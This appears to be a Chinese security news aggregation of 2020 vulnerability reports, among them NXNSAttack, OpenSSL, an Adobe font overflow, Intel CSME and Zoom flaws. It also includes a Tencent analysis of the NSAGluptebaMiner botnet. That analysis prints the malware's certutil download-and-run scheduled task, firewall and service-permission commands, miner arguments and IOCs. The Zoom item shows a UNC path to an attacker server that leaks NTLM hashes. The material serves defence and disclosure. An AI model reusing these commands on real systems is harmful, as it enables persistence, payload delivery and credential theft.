标签: 漏洞事件

多种 DNS 解析程序被发现漏洞 允许攻击者发动拒绝服务攻击

DNS 解析程序的一个漏洞允许攻击者通过封包放大创造拒绝服务条件。该漏洞被称为 NXNSAttack。攻击者滥用了 DNS 委托机制,它发送的委托只包含权威 DNS 服务器的名字但不包含其 IP 地址。 DNS 解析程序不能向“名字”发送域名查询,因此解析器首先需要获得权威 DNS 服务器的 IPv4 或 IPv6 地址,之后才能继续查询域名。 NXNSAttack 就是基于这一原理,攻击者发送的委托包含了假的权威服务器名字,指向受害者的 DNS 服务器,迫使解析程序对受害者的 DNS 服务器生成查询。一次查询会被放大数十次乃至数百次,对受害者服务器发动了拒绝服务攻击。 众多 DNS 软件都受到影响,其中包括 ISC BIND (CVE-2020-8616)、NLnet labs Unbound (CVE-2020-12662)、PowerDNS (CVE-2020-10995)、 CZ.NIC Knot Resolver (CVE-2020-12667)、Cloudflare、Google、Amazon、Microsoft、Oracle(DYN)、Verisign、IBM Quad9 和 ICANN。细节可查阅论文。     (稿源:solidot,封面源自网络。)

Edison Mail 爆严重 BUG:同步后可全权访问他人帐号内容

Edison Mail是一款在iPhone、iPad和Mac上比较流行的第三方电子邮件应用,不过近日曝光的一个BUG引起了人们对隐私的极大关注。Edison Mail用户报告称,在该应用中开启新的账户同步功能后,他们可以完全访问其他Edison Mail用户的电子邮件账户。 Edison Mail在给外媒9to5Mac一份声明中表示这个BUG目前只影响iOS用户: 10小时前,我们向少部分iOS用户推出了一个软件更新。在收到这些更新的部分用户遇到了影响邮件账户的应用漏洞,今天早上我们已经注意到了这个漏洞。我们已经迅速回滚了该更新。我们正在联系受影响的Edison Mail用户(仅限于过去10小时内更新并打开应用的用户子集),通知他们。 目前来看,这似乎是一个BUG,而不是安全漏洞。这个问题似乎源于上周在Edison Mail客户端推出的新同步功能。 Zach Knox是Edison Mail的首批用户之一,他今天早上在Twitter上反馈存在这个问题。 我刚刚更新了@Edisonapps Mail,在启用了一个新的同步功能后,一个不是我的邮件账户出现在应用中,我似乎可以完全访问。这是一个重大的安全问题。在没有凭证的情况下访问他人的电子邮件! 我再也不会相信这个应用程序了。   (稿源:cnBeta,封面源自网络。)

OpenSSL 高危漏洞影响 OpenSSL 1.1.1 的多个版本

OpenSSL 项目发布安全公告称存在一个影响 OpenSSL 1.1.1d, 1.1.1e 和 1.1.1f 的高危漏洞 (CVE-2020-1967),该漏洞可被用于发起 DoS 攻击。根据官方对该漏洞的描述,在 TLS 1.3 握手期间或握手之后调用 SSL_check_chain() 函数的服务器或客户端应用可能会导致崩溃,原因是不正确处理”signature_algorithms_cert” TLS 扩展而引起的空指针引用。 如果从另一方接收到一个无效或未被识别的签名算法,则会发生崩溃。这可能会被恶意攻击者利用并发起 DoS 攻击。 该漏洞由 Bernd Edlinger 通过 GCC 中的新静态分析通道 -fanalyzer 发现,并已于2020年4月7日向 OpenSSL 报告。 对于受影响的 OpenSSL 1.1.1(1.1.1d,1.1.1e 和 1.1.1f)用户,建议尽可能快地升级到 1.1.1g。OpenSSL 1.1.1d 之前的版本不受此漏洞影响。 更早的版本如 OpenSSL 1.0.2 和 1.1.0 也均未受影响,不过这些版本都不再被支持,也无法再接受更新。建议使用这些版本的用户升级至 OpenSSL 1.1.1。   (稿源:开源中国,封面源自网络。)

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征: 利用永恒之蓝漏洞攻击传播; 安装计划任务实现持久化,任务利用certutil.exe下载木马; 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传; 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单; 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护; 运行门罗币挖矿程序wup.exe; 利用组件cloudnet.exe构建僵尸网络; 连接远程服务器,接收指令完成远控操作; 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp) 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。 在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序: Winmon.sys用于隐藏对应PID进程; WinmonFS.sys隐藏指定文件或目录; WinmonProcessMonitor.sys查找指定进程,并关闭。 维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。 下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能,包括下载文件、程序执行等。 各函数及对应操作如下: 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包,在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包,读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则,将csrss.exe添加到白名单: `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单: cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行: `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2: 通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。 运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。 组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项,如有进行清除: 目录和文件: C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表: HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务: ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池: premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

疫情期间美国 IC3 网络犯罪报告量激增 每天接到 3000-4000 起

自新冠病毒疫情在美国蔓延以来,联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增,主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨(Tonya Ugoretz)周四表示,IC3每天收到3000-4000起网络安全投诉,而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上,乌戈雷茨表示:“我们的网络漏洞越来越多,也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家,而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到:“各国对有关病毒的信息非常感兴趣,例如关于疫苗的信息。我们的确发现有侦察活动,一些攻入那些机构的行为,尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称,研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出,“不好的一面是,这会让他们成为其他有兴趣搜集研究细节的国家的目标,这些国家甚至可能会窃取这些机构的知识产权信息。”她表示,FBI发现,这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   (稿源:cnBeta,封面源自网络。)

安全漏洞让用户紧张 Zoom引入重量级安全员修复

4月17日消息,据国外媒体报道,由于视频会议平台Zoom的安全漏洞引起美国相关部门注意且让客户担忧,公司雇佣了一批重量级安全员来修复漏洞。 疫情期间广受欢迎的Zoom在过去两周内已经聘请了数十名外部安全顾问。据知情人士透露,这些人中有来自Facebook、微软和谷歌等公司的前安全和隐私专家,他们希望迅速解决有关安全漏洞的问题。 Facebook前首席安全官亚历克斯·斯塔莫斯(Alex Stamos)表示,Zoom此举是借鉴了微软将近20年前为恢复Windows软件形象而采取的行动。微软在2002年转向“值得信赖的计算”之前,存在多年的安全问题让Windows用户容很易受到互联网蠕虫和其他病毒的攻击,从而损害微软的声誉。 疫情期间数百万人呆在家中,使得Zoom人气飙升,也引来了很多网络流氓和黑客的注意,以及隐私倡导者的审查。未经授权闯入会议的“Zoombombing”现象成为许多用户面临的问题。 报道称,安全专家在Zoom用于保护对话安全的密码系统中发现了大量软件漏洞和错误,这让Zoom公司受到打击。 据曾与公司合作过的顾问说,Zoom公司修复其系统和声誉所利用的资源远远少于当时已经是软件巨头的微软公司。 “他们被推到聚光灯下接受世界上最大科技公司才会受到的严格审查,”斯塔莫斯说。“那些公司往往有数百名工程师组成的团队,多年专门致力于安全实践。” Zoom目前引入的安全公司包括英国安全供应商NCC Group PLC、总部位于美国纽约的Trail of Bits、位于亚利桑那州坦佩的Bishop Fox以及位于德克萨斯州奥斯汀的Praetorian Security等公司。Zoom还正在使用CrowdStrike和Queen Associates旗下安全情报机构DarkTower提供的安全情报服务。 Zoom公司首席执行官袁征在4月1日的一篇博客文章中宣布,Zoom公司将冻结产品开发,并承诺在未来90天内解决公司安全问题。几天后他说,“我真的搞砸了。”他还表示,公司现在会优先考虑安全性,而不是易用性。   (稿源:网易科技,封面源自网络。)

微软发布字体解析远程代码执行漏洞补丁,建议用户尽快修补

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞背景 3月23日,微软发布公告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞,当Windows Adobe Type Manager Library处理Adobe Type 1 PostScript 格式字体时存在两个远程执行代码漏洞。 4月15日,谷歌安全团队称已发现该漏洞的野外利用,微软在4月例行安全更新中,已修补CVE-2020-1020/CVE-2020-0938漏洞。 腾讯安全团队已对漏洞进行分析,该漏洞可稳定利用: 视频详见:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞版本 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Version 1803 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows 8.1 for 32-bit systems Windows 8.1 for x64-based systems Windows RT 8.1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1803 (Server Core Installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) 漏洞分析 漏洞模块为atmfd.sys(Windows 10 1703后是fontdrvhost.exe),成因在于Windows解析PostScript字体中的BlendDesignPositions或BlendVToHOrigin时,没有经过安全检查,导致处理模块可能引发越界写,栈溢出的问题。 SetBlendDesignPositions BlendDesignPositions格式如下: Win7 x86环境下,atmfd!SetBlendDesignPositions在解析BlendDesignPositions array时,会将内容全部保存到栈上,缓冲区的大小是960(0x3C0),因此最多存放16个sub-array,当sub-array数量大于16时,会引发溢出: ParseBlendVToHOrigin atmfd!ParseBlendVToHOrigin在处理数组BlendVToHOrigin时存在两处溢出。 Win7x86下由于定义的int v12[2]仅有8个字节,当NumMasters大于2时,引发缓冲区溢出: NumMasters大小可以在字体文件中通过构造特殊的BlendDesignPositions或WeightVector控制: 第二处溢出发生在atmfd.sys读取BlendVToHOrigin时,首先获取当前NumMasters并根据其大小将BlendVToHOrigin的数据复制到栈中的V11,由于NumMasters可控,当NumMasters过大时会对栈中的v11造成溢出,V11同样也是8字节: 第二次溢出时,由于V12在V11的高地址方向,所以当V11溢出时会覆写V12中保存的指针。 补丁分析 由于win7已停止更新,win10 1703后微软把atmfd.sys模块的功能移植到fontdrvhost.exe中,补丁前后漏洞模块共做了2处修改,2个函数均存在栈溢出漏洞: 补丁后SetBlendDesignPositions中增加了条件判断,sub-array数量超过16时返回错误,避免溢出: 补丁后ParseBlendVToHOrigin中启用了GS保护栈的完整性,并在读取BlendVToHOrigin数组前,限制了NumMasters大小; 解决方案 1. 推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客利用漏洞的攻击行为进行检测。腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 腾讯T-Sec高级威胁检测系统可检测利用Type 1字体漏洞的攻击行为 2.推荐企业用户使用腾讯T-Sec终端安全管理系统(御点)修补各终端系统的安全漏洞,个人用户可使用腾讯电脑管家的漏洞修补功能安装补丁,也可使用Windows Update。 时间线 3月23日,微软发布通告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞; 3月24日,腾讯安全发布漏洞通告; 4月15日,微软官方发布CVE-2020-1020/CVE-2020-0938漏洞通告及补丁。 参考链接: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938

Zoom 客户端爆出安全漏洞 可向攻击者泄露 Windows 登陆凭据

近日,Windows 版 Zoom 客户端爆出了容易受到 NUC 路径注入攻击的安全漏洞。作为一款音视频会议应用,Zoom 还允许用户在聊天界面通过发送文本消息来互相交流。然而外媒 Bleeping Computer 指出,攻击者可利用聊天模块的漏洞,窃取点击了相关链接的用户的 Windows 登陆凭据。 发送聊天消息时,所有发送的 URL 都将经过转换,以便群内其他成员点击,继而在默认的浏览器中打开网页。 然而安全研究人员 @ _g0dmode 发现,Zoom 客户端竟然还将 Windows 网络 UNC 路径,也转换成了聊天消息中可单击的链接。 如图所示,常规 URL 和 NUC 路径(\\evil.server.com\images\cat.jpg),都被转换成了聊天消息中的可点击链接。 若用户单击 UNC 路径链接,则 Windows 将尝试使用 SMB 文件共享协议连接到远程站点,以打开远程路径中的 cat.jpg 文件。 默认情况下,Windows 将发送用户的登录名和 NTLM 密码哈希值,但稍有经验的攻击者均可借助 Hashcat 之类的免费工具来逆向运算。 安全研究人员 Matthew Hickey(@ HackerFantastic)实测发现,其能够在 Zoom 中顺利注入,并且可以借助当前的民用级 GPU 和 CPU 来快速破解。 除了窃取 Windows 登陆凭据,Hickey 还向 Bleeping Computer 透露,通过点击链接的方式,UNC 注入还适用于启动本地计算机上的程序(比如 CMD 命令提示符)。 庆幸的是,Windows 会在程序被执行前发出是否允许其运行的提示。想要堵上这一漏洞,Zoom 必须阻止 Windows 客户端的 UNC 路径转换功能(屏蔽部分可点击的超链接)。 据悉,Hickey 已经在 Twitter 上向 Zoom 官方发去了有关该安全漏洞的通知,但目前尚不清楚该公司已采取怎样的行动。 注重安全的客户,可在官方补丁发布前,通过组策略来限制向远程服务器传出 NTLM 通信(参考如下操作): 计算机配置 -> Windows 设置 -> 安全设置 -> 本地策略 -> 安全选项 -> 网络安全:限制NTLM -> 发送到远程服务器的 NTLM 通信(然后全部配置为拒绝)。 需要注意的是,如果在已经加入相关域的计算机上配置上述组策略时,可能会在尝试访问共享时遇到问题。 如果是无权访问组策略设置 Windows 10 家庭版用户,亦可使用注册表编辑器来完成相关限制操作(dword 配置为 2): [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]”RestrictSendingNTLMTraffic”=dword:00000002 如需正确创建此键值,Windows 用户记得以管理员身份来启动注册表编辑器。 若日后有必要恢复默认发送 NTLM 凭据的 Windows 行为,也只需删除对应的 RestrictSendingNTLMTraffic 键值。   (稿源:cnBeta,封面源自网络。)  

White Source 研究报告:开源漏洞在 2019 年增长近 50%

开源组件已成为当今许多软件应用程序的基础组成部分,这也使得其在安全性方面受到越来越严格的审查。根据开源管理专家 WhiteSource 发布的一份新报告,可知 2019 年公开的开源软件漏洞数增加到了 6000 多个,增速接近 50% 。庆幸的是,有超过 85% 的开源漏洞已被披露,且提供了相应的修复程序。 遗憾的是,开源软件的漏洞信息并没有集中在一处发布,而是分散在数百种资源中。有时索引的编制并不正确,导致搜索特定数据成为了一项艰巨的挑战。 根据 WhiteSource 的数据库,在国家漏洞数据库(NVD)之外报告的所有开源漏洞中,只有 29% 最终被登记在册。 此外研究人员比较了 2019 年漏洞排名前七的编程语言,然后将之与过去十年的数量进行了比较,结果发现历史基础最好的 C 语言占有最高的漏洞百分比。 PHP 的相对漏洞数量也大幅增加,但没有迹象表明其流行度有同样的提升。尽管 Python 在开源社区中的普及率持续上升,但其漏洞百分比仍相对较低。 报告还考虑了通用漏洞评分系统(CVSS)的数据,是否是衡量补漏优先级的最佳标准。 过去几年中,CVSS 已进行了多次更新,以期达成为可对所有组织和行业提供支持的客观可衡量标准。 然而在此过程中,CVSS 也改变了高严重性漏洞的定义。这意味着在 CVSS v2 标准下被定为 7.6 的漏洞,在 CVSS v3.0 标准下可能被评为 9.8 。 对于各个开源软件的开发团队来说,这意味着他们面临着更多的高严重性漏洞问题,导致现有超有 55% 的用户被高严重性或严重性问题所困扰。 报道作者总结道:列表中提及的开源项目漏洞,并不意味着其本质上是不安全的。作为用户,也应了解相关安全风险,并确保将开源依赖保持在最新状态。   (稿源:cnBeta,封面源自网络。)

英特尔 CSME 爆出严重安全漏洞 现已发布修复补丁

近日英特尔发布公告称自家CPU主控存在严重的安全漏洞,允许黑客绕过存储加密、授权内容保护,并在物联网设备中接管控制硬件传感器。目前英特尔官方已经发布了固件和软件更新,并提供检测工具以缓解这些漏洞的影响。 该漏洞存在于啊英特尔融合的安全性和可管理性引擎(CSME)中,具有物理访问权限的攻击者可以在单个平台上执行以下操作: 绕过英特尔反重播保护, 从而允许对存储在英特尔CEME内的机密进行潜在的暴力攻击; 获得未经授权的英特尔管理引擎BIOS扩展 (英特尔MEBX) 密码; 篡改英特尔CSME文件系统目录或服务器平台服务和可信执行环境数据文件的完整性。 英特尔®融合安全管理引擎(英特尔® CSME)子系统中的潜在安全漏洞可能允许: 特权提升 拒绝服务 信息泄露 受影响产品: 在12.0.49 (仅限 IoT:12.0.56)、13.0.21、14.0.11 之前,此潜在漏洞不会影响英特尔® CSME 版本。英特尔 CSME/ME 版本10和11。 此外英特尔还提供了检测工具CSME_Version_Detection_Tool_Windows .zip:适用于 Windows用户 该下载包含两个版本的工具: 第一个版本是一种交互式 GUI 工具,可用于发现设备的硬件和软件细节,并提供风险评估。建议对系统的本地评估使用此版本。 该工具的第二个版本是控制台可执行文件,它将发现信息保存到 Windows 注册表和/或 XML 文件中。对于想要跨多台机器执行批量发现的 IT 管理员来说,这一版本更方便,可以找到面向固件更新的系统。 CSME_Version_Detection_Tool_Linux tar gz:适用于 Linux 用户,该工具的版本是一个命令行可执行文件,它将显示被测系统的风险评估。   (稿源:cnBeta,封面源自网络。)